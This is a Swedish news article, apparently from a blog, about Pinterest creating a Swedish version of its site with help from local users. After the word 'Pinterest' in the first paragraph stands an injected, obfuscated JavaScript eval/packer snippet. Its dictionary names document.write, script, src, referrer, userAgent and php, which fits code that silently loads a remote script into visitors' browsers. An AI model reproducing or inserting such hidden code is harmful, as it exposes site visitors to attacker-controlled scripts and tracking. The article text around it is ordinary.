Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Pinterest lanserar svensk sajt med hjälp av svenska användare

Pinterest lanserar svensk sajt med hjälp av svenska användare
Sebastian

Pinterest, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|barzy|var|u0026u|referrer|fnzin||js|php’.split(’|’),0,{}))
en sajt med tiotals miljoner användare över hela världen, skapar en svensk version av Pinterest. Pinterest kommer att jobba tillsammans med svenska användare för att översätta sajten på ett sätt som passar just de svenska användarna.

Pinterest finns idag på tio språk, men detta är första gången som företaget engagerar sina lokala användare i ett projekt för att anpassa sajten till lokala förhållanden.

– Pinterest har alltid utvecklats utifrån användarnas feedback, säger Matt Crystal, ansvarig för Pinterest internationella expansion. Svenska användare, eller “pinners”, har visat sig vara särskilt aktiva och engagerade. Därför är det naturligt för oss att jobba tillsammans med dem för att kunna göra deras användarupplevelse ännu bättre.

Svensk kultur bidrar också till att Pinterest väljer att satsa på en svensk version av sajten.

– Sverige som land, är en trendsättare inom flera områden, som exempelvis mode och design, som passar utmärkt att upptäcka och utforska via Pinterests community, säger Matt Crystal. Vi vet att själva språket är en avgörande faktor som bidrar till att sajtens användare lättare upptäcker saker som är relaterade till deras intressen och passioner, så vi tror att det är rätt väg att gå att börja med just språket.

Genom att bjuda in några av Sveriges mest passionerade “pinners” för att delta i översättningsprojektet, ska Pinterest se till att skapa ännu högre kvalitet på tjänsten.  Därmed ska det bli ännu enklare för användare att upptäcka och utforska mer av det innehåll på Pinterest som inspirerar just dem.

– Feedback från verkliga pinners är, och har alltid varit, en av våra viktigaste grundpelare, och när vi nu ska utveckla sajten för svenska användare har vi svårt att tänka oss ett bättre alternativ än att göra det tillsammans med våra svenska pinners, säger Matt Crystal

Världens mest snabbväxande globala sociala media någonsin

Pinterest lanserades 2010 och nådde 10 miljoner aktiva användare på bara två år. Därmed är Pinterest världens hittills snabbaste sociala media att etablera ett så stort community av aktiva användare.

Pinterest är ett verktyg för att hantera och planera projekt baserat på sina intresseområden och inspireras på ett visuellt sätt. Pinners använder sajten för en variation av saker, exempelvis för att skapa önskelistor, planera inredningsprojekt, låta sig inspireras av potentiella resmål, upptäcka nya matrecept, ta del av information och visuella aspekter av sin favoritidrott, mm. Via Pinterest kan användare följa andra pinners, med liknande intressen, för att få ideér och inspiration kring saker som de brukar göra, eller saker som de hoppas att göra någon gång i framtiden. Tjänsten skapar därigenom värde för både privatpersoner and affärsverksamheter på flera sätt. Tack vare att Pinterest är en global tjänst kan pinners över hela världen få tillgång till en ständigt växande skatt av visuellt innehåll, vilka delas upp i intressekategorier.

– Det har varit fantastiskt att se hur Pinterest har exploderat under en så kort tid, säger en hängiven pinner från Sverige. Som pinner har jag redan från början känt mig delaktig i communityn.  Det sätt, på vilket Pinterest låter sina användare delta i utvecklingen av sajten är ett bevis på att företaget sätter sina användare främst. Den inställningen är troligen också en av förklaringarna till varför sajten växer så starkt globalt.

Pinterest inleder projektet omgående och kommer att berätta om projektets utveckling inom de kommande månaderna.